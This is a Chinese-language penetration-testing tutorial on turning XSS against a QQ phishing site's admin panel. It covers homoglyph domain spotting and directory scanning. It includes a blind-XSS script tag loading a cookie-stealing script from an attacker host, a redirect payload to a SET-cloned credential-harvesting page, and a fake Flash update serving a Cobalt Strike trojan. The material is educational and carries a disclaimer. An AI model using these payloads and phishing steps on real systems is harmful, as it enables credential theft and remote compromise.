XSS 實戰攻擊思路總結

鑑別網站

下面是一個經典的 QQ 空間釣魚網站：

域名分析

釣魚網站最直觀的就是看域名，能夠看到目標網站域名 ：http://qq.xps.com 儘管域名中出現了 qq 字樣，可是一級域名倒是 http://xps.com 這一點就直接暴露了釣魚網站的本性。

早期還有一種利用拉丁字母註冊的域名僞造釣魚網站的案例，這種就比較逼真了，下面國光簡單列舉一些：

OPPO 官網 真假域名

# 真域名
www.oppo.com

# 假域名
www.οppο.com

Pornhub 官網真假域名

# 真域名
www.pornhub.com

# 假域名
www.ρornhub.com

惟品會官網 真假域名

# 真域名
www.vip.com

# 假域名
www.νip.com

關於這類域名就再也不列舉了，早期這種方法成功率是很是的高的，有時候甚至均可以欺騙到咱們這種專業的信息安全從業者。

功能分析

釣魚網站既然是要釣魚的話，說那麼多半還會有後臺管理功能。因此使用常規的目錄掃描工具多半能夠掃描出一些端倪出來：

dirsearch -u "http://qq.xps.com/" -e * -x 301

果真掃描出了這個 QQ 空間釣魚網站的後臺登陸口了：http://qq.xps.com/admin/login.php

至此基本上已經能夠肯定這個目標網站就是傳說中的釣魚網站了，下面來看一下這個釣魚網站是如何運做的吧。

釣魚流程

小白用戶前臺輸入本身的 QQ 帳號和密碼信息，點擊登陸後域名跳轉到真正的 QQ 官網：

而後用戶再輸入本身的 QQ 帳號和密碼就能夠成功登錄了。

目前不少釣魚網站都是這種思路，這可讓被釣者產生一種本身第一次是密碼不當心輸入錯誤的錯覺，從而放鬆警戒，妙啊！真是妙蛙種子吃着妙脆角，妙進了米奇妙妙屋 妙到家了

而後釣魚網站的管理員天天會到本身的 QQ 空間釣魚管理中內心面看看今天又有哪些菜雞上鉤了：

能夠看到上鉤者的 QQ 號爲：1314520 密碼爲：sbhac... 唉，不對勁？貌似本身被羞辱了一番......

攻擊思路

本文主要是來梳理一下 XSS 常劍的攻擊思路，關於 XSS 覺得的思路不在本文的敘述範圍內，另外若是有小夥伴要不錯新的姿式的話歡迎評論區裏面或者郵件留言，國光往後會繼續完善本文的。

思路一：XSS 盲打

若是目標網站存在 XSS 的話且沒有 httponly 防護 cookie 那麼就能夠直接盲打 XSS。首先準備一個 XSS 靶場，國光這裏比較推薦 Github 上面開源的藍蓮花 XSS 平臺。

官方項目地址爲：https://github.com/firesunCN/BlueLotus_XSSReceiver

惋惜已經清空數據了，還好國光我 fork 了一份：

國光 fork 的項目地址爲：https://github.com/sqlsec/BlueLotus_XSSReceiver

而後使用 XSS 平臺裏面的模塊來生成一個 XSS payload：

<script src="http://10.20.24.244/xss/myjs/x.js"></script>

能夠去掉多餘的雙引號：

<script src=http://10.20.24.244/xss/myjs/x.js></script>

而後回到釣魚網站前臺，在用戶名或者密碼出插入 payload（理論上來講 密碼處成功率要高一點），若是有表單長度限制的話，能夠手工審查元素修改 input 的長度限制：

這樣黑客攻擊的步驟基本上就走完了，下面回到釣魚網站管理員的視角。

釣魚網站的搭建者到本身的 QQ 空間釣魚管理中內心面看看今天又有哪些菜雞上鉤了：

發現真的有菜雞上鉤，密碼竟然是 1111111111 嘴角忍不住上仰。

此時他不知道的是，用戶帳號旁邊實際上有一串 JS 代碼被解析了，而此時黑客在 XSS 平臺裏面能夠直接看到管理員已經上鉤了：

能夠直接看到管理員的後臺地址和 cookie 信息，拿到後臺地址和 Cookie 信息就能夠直接抓包替換 Cookie 登陸到釣魚網站的後臺，這些基本操做國光我就不在囉嗦了，下面來講一下另外一種思路。

思路二：SET 釣魚

假設目標網站存在 httppnly 的話，咱們拿到的 cookie 信息也是不完整的，因此傳統的思路是行不通的，這種狀況下該怎麼辦呢？仔細想一想，既然不能正面肛 httponly 的話，那麼爲何不考慮繞過他呢？

下面國光主要描述一下如何使用 Kali Linux 裏面的 set 社工工程學工具包來進行釣魚。

SET 在 Kali Linux 裏面的全稱是 social engineering toolkit：

Github 項目地址爲：https://github.com/trustedsec/social-engineer-toolkit

點擊便可直接啓動，首先會看到以下的菜單：

Select from the menu:

   1) Social-Engineering Attacks         # 社會工程攻擊
   2) Penetration Testing (Fast-Track)   # 滲透測試（快速通道）
   3) Third Party Modules                # 第三方模塊
   4) Update the Social-Engineer Toolkit # 更新 SET
   5) Update SET configuration           # 更新 SET 配置
   6) Help, Credits, and About           # 幫助

  99) Exit the Social-Engineer Toolkit   # 退出

set> 1

選擇 1 後進入到下面的菜單：

Select from the menu:

   1) Spear-Phishing Attack Vectors        # 魚叉式網絡釣魚攻擊
   2) Website Attack Vectors               # 網站攻擊
   3) Infectious Media Generator           # 感染性介質生成
   4) Create a Payload and Listener        # 建立 Payload 和 監聽器
   5) Mass Mailer Attack                   # 羣發郵件
   6) Arduino-Based Attack Vector          # 基於 Arduino 的攻擊
   7) Wireless Access Point Attack Vector  # 無線接入點攻擊
   8) QRCode Generator Attack Vector       # 二維碼生成器攻擊
   9) Powershell Attack Vectors            # Powershell 攻擊
  10) Third Party Modules                  # 第三方模塊

  99) Return back to the main menu.        # 返回主菜單

set> 2

選擇 2 後進入到下面的菜單：

1) Java Applet Attack Method           # Java Applet 攻擊
   2) Metasploit Browser Exploit Method   # Metasploit Browser 瀏覽器攻擊
   3) Credential Harvester Attack Method  # 憑證竊取攻擊
   4) Tabnabbing Attack Method            # 標籤頁劫持       
   5) Web Jacking Attack Method           # 網頁劫持攻擊
   6) Multi-Attack Web Method             # 綜合網頁攻擊
   7) HTA Attack Method                   # HTA 攻擊

  99) Return to Main Menu                 # 返回主菜單

set:webattack> 3

選擇 3 進入到下面的菜單：

1) Web Templates       # 網站模板
   2) Site Cloner         # 站點克隆
   3) Custom Import       # 自定義導入

  99) Return to Webattack Menu # 返回主菜單

set:webattack> 2

選擇 2 而後具體看下下面的操做：

這個時候一個假的釣魚網站就製做完成了，訪問 Kali Linux 的 80 端 10.20.25.39 效果以下：

這個登陸入口和 http://qq.xps.com/admin/login.php 的登陸口如出一轍：

如今的任務就是想辦法讓管理員在假的網站裏面輸入網站的後臺用戶名和密碼信息，那麼該怎麼誘導管理員點擊呢？對，聰明的網友確定想到了，仍是利用 XSS，準備下方的 payload，這個 XSS 的做用就是普通的連接跳轉：

<script>window.location.href="http://10.20.25.39/"</script>

而後將這個 payload 插入到釣魚網站的後臺中：

此時管理員到本身的 QQ 空間釣魚管理中內心面看看今天又有哪些菜雞上鉤了，結果沒想到網站瀏覽器卻跳轉到了：10.20.25.39 頁面，這個就是咱們製做的假的QQ 空間釣魚管理中心的登陸界面。

若是管理員大意的話，這個時候會覺得登陸會話超期了，須要從新登陸，就在咱們假的網站後臺裏面輸入了真正的密碼：

咱們這個假的網站也很是妙，登陸後自動轉發到正確的網站登陸成功，真是學以至用呀~~

管理員放鬆警戒的同時，咱們的 Kali Linux 裏也竊取到管理員的明文帳號和密碼信息了：

拿到這個後臺就能夠成功登錄了，Bingo ~

固然若是管理員是一個有很高安全意識的人，多是不會上當的，本案例僅供意淫參考使用，實際運用仍是得看運氣。

思路三：Flash 釣魚

這也是 B 站 視頻裏面提到過的方法，首先咱們須要準備一個釣魚頁面，這裏在 Github 上搜索到了 2 個 相關的項目，下面分別展現一下：

項目地址：https://github.com/Wileysec/adobe-flash-phishing-page

模仿的 Flash Player 中文官網的頁面

項目地址： https://github.com/r00tSe7en/Flash-Pop

這種的就要稍微激進一點，強迫症都會忍不住去點擊下載的：

國光這裏選擇了第 2 種激進的方法，點擊當即升級的這個按鈕點擊會下載好國光我準備好的 CS 木馬。若是管理員覺得本身的 Flash 版本太低的話，可能會下載並運行這個木馬：

這裏偷懶了沒有給 Flash.exe 添加圖標僞造一下，關於圖標僞造你們能夠參考以前的文章：

爲 Cobalt Strike exe 木馬添加圖標

若是順利的話就會成功上線 CS：

總結

免責聲明：本文出現的思路案例僅供網絡安全學習和研究技術使用，禁止使用本文的攻擊技術工具用於非法用途，不然後果自負，另外文中所使用的 QQ 空間釣魚網站是人爲修改的漏洞靶場。